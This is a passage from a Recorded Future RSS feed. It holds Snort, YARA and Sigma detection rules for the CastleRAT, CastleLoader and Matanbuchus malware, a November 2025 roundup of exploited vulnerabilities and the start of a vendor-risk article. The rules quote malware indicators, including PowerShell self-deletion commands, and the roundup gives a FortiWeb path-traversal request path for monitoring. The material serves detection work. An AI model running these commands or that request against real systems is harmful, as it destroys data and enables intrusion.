alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix K: Snort Rules for Matanbuchus</h2>
        <div>
          <div>
            <div>
              <pre><code>alert udp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix L: Yara Rule for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix M: Yara Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize &lt; 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61"  wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5  = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10  = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide

     condition:
       uint16(0) == 0x5a4d and
       any of ($log_tag*) and
       any of ($wnd_class*) and
       any of ($log_fmt*) and
       all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize &lt; 50KB and $s9 at 0 and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix N: CastleRAT Sigma Rules</h2>
        <div>
          <div>
            <div>
              <pre><code>title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix O: MITRE ATT&amp;CK Techniques</h2>
        <div>
          <div>
            <div><strong>Tactic: Technique</strong></div>
            <div><strong>ATT&amp;CK Code</strong></div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Phishing</div>
            <div>T1566</div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Drive-by Compromise</div>
            <div>T1189</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious File</div>
            <div>T1204.002</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious Copy and Paste</div>
            <div>T1204.004</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: PowerShell</div>
            <div>T1059.001</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: AutoHotKey &amp; AutoIT</div>
            <div>T1059.010</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Domains</div>
            <div>T1583.001</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Virtual Private Server</div>
            <div>T1583.003</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Server</div>
            <div>T1583.004</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Access</div>
            <div>T1650</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Obtain Capabilities: Tool</div>
            <div>T1588.002</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Compromise Accounts: Email Accounts</div>
            <div>T1586.002</div>
          </div>
          <div>
            <div><strong>Defense Evasion:</strong> Masquerading</div>
            <div>T1036</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Proxy: External Proxy</div>
            <div>T1090.002</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Application Layer Protocol: Web Protocols</div>
            <div>T1071.001</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Ingress Tool Transfer</div>
            <div>T1105</div>
          </div>
          <div>
            <div><strong>Collection:</strong> Data from Local System</div>
            <div>T1005</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_171fa690104f0a5274fe66bfe605332a13a3fc906.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October]]></title>
            <link>https://www.recordedfuture.com/blog/november-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/november-2025-cve-landscape</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[November 2025 CVE landscape: 10 exploited critical vulnerabilities, a 69% drop from October, and why Fortinet and Samsung flaws need urgent patching.]]></description>
            <content:encoded><![CDATA[
        <p>November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>10 vulnerabilities</strong> requiring immediate attention, <a href="https://www.recordedfuture.com/blog/october-2025-cve-landscape">down from 32 in October</a>.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Fortinet leads concerns:</strong> Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation</li>
          <li><strong>LANDFALL spyware campaign:</strong> Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks</li>
          <li><strong>Public exploits proliferate:</strong> Seven of ten vulnerabilities have public proof-of-concept code available</li>
          <li><strong>OS Command Injection and Out-of-bounds Write</strong> were tied as the most common weakness types</li>
        </ul>
        <p><strong>Bottom line:</strong> The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.</p>
        <h2>Quick Reference: November 2025 Vulnerability Table</h2>
        <p><em>All 10 vulnerabilities below were actively exploited in November 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAWo-07/overview">CVE-2025-12480</a></div>
            <div>99</div>
            <div>Gladinet Triofox</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAY-aVO/overview">CVE-2025-62215</a></div>
            <div>99</div>
            <div>Microsoft Windows 10 and 11; Microsoft Windows Server 2019, 2022, and 2025</div>
            <div>CWE-362 (Race Condition), CWE-415 (Double Free)</div>
            <div><a href="https://github.com/search?q=%22CVE-2025-62215%22&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAgNrn4/overview">CVE-2025-64446</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-23 (Relative Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-64446&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAnoPpx/overview">CVE-2025-13223</a></div>
            <div>99</div>
            <div>Google Chrome</div>
            <div>CWE-843 (Type Confusion)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BApQp8P/overview">CVE-2025-58034</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58034&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_ob8BJ/overview">CVE-2025-61757</a></div>
            <div>99</div>
            <div>Oracle Identity Manager</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2025-61757&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-R66PT/overview">CVE-2025-9242</a></div>
            <div>99</div>
            <div>WatchGuard Fireware OS</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/search?q=CVE-2025-9242&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-HNHUv/overview">CVE-2025-21042</a></div>
            <div>99</div>
            <div>Samsung Mobile Devices</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/B1ack4sh/Blackash-CVE-2025-21042">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6VoCY0/overview">CVE-2025-48703</a></div>
            <div>99</div>
            <div>CentOS Web Panel</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-48703&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/iwWgRF/overview">CVE-2021-26829</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-79 (Improper Neutralization of Input During Web Page Generation [Cross-site Scripting])</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends: November 2025</h2>
        <h3>Vendors Most Affected</h3>
        <ul>
          <li><strong>Fortinet</strong> dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation</li>
          <li><strong>Microsoft</strong> faced a kernel-level race condition affecting all modern Windows versions</li>
          <li><strong>Samsung</strong> saw the weaponization of an image processing vulnerability for sophisticated mobile attacks</li>
          <li>Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for first)</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write (tied for first)</li>
          <li><strong>CWE-284</strong> – Improper Access Control</li>
          <li><strong>CWE-362</strong> – Race Condition</li>
          <li><strong>CWE-306</strong> – Missing Authentication for Critical Function</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>LANDFALL Android spyware campaign</strong> marked November's most sophisticated operation:</p>
        <ul>
          <li>Exploited <strong>CVE-2025-21042</strong> for zero-click remote code execution on Samsung devices</li>
          <li>Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware</li>
          <li>Deployed via weaponized DNG image files through WhatsApp</li>
          <li>Achieved persistent device compromise without user interaction</li>
          <li>Demonstrated advanced anti-analysis and SELinux bypass capabilities</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-64446 | Fortinet FortiWeb</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added November 14, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.</p>
        <p><strong>Affected versions:</strong> FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)</li>
          <li>Monitor for POST requests to <code>/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi</code></li>
          <li>Check for unauthorized admin accounts created since October 2025</li>
          <li>Review logs for Base64-encoded CGIINFO headers</li>
          <li>Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed</li>
        </ul>
        <p><strong>Exposure:</strong> ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13b330b3e13aad900440407bcd3dde599640b59e9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="797" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1afc13c5574e9a8966347fe80012616de5d023fd2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[5 Real-Word Third-Party Risk Examples]]></title>
            <link>https://www.recordedfuture.com/blog/third-party-risk-examples</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/third-party-risk-examples</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore 5 third-party risk examples, from vendor data breaches to supply chain attacks and learn how third-party risk management can prevent cyberattacks.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Static vendor checks fall short:</strong> Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.</li>
          <li><strong>Five common risk scenarios:</strong> Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.</li>
          <li><strong>Intelligence-driven defense:</strong> Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.</li>
          <li><strong>From trust to verification:</strong> The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.</li>
        </ul>
        <h2>Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights</h2>
        <p>For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.</p>
        <p>Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.</p>
        <p>This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.</p>
        <p>This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-management">third-party risk management</a> and threat intelligence is the only effective prevention.</p>
        <h2>5 Third-Party Risk Examples and How to Prevent Them</h2>
        <p>Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:</p>
        <h3>Type 1: The Software Supply Chain Attack</h3>
        <p><strong>The Scenario:</strong> One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.</p>
        <p><strong>Real-World Example:</strong> <a href="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic">The SolarWinds Orion breach</a> is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.</p>
